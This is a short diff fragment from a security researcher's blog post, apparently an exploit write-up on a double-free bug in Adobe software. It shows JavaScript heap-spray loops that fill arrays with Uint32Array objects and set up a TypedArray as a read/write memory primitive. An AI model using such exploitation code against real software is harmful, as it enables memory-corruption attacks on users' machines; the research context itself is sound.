sourceincite/sourceincite.github.io/_posts/2018-05-21-adobe-me-and-a-double-free.md

             for(var i2 = 0x10; i2 < 0x10000; i2++)
                 arr[i2] = new Uint32Array(1);
             for(var i2 = 1; i2 < 0x10; i2++){

-                arr[i2] = new Uint32Array(sprayarr[i1 + i2]);
+                // this is the TypedArray that used for the full read/write primitive arr[i2] = new Uint32Array(sprayarr[i1 + i2]);

                 // set the index into the first element of the TypedArray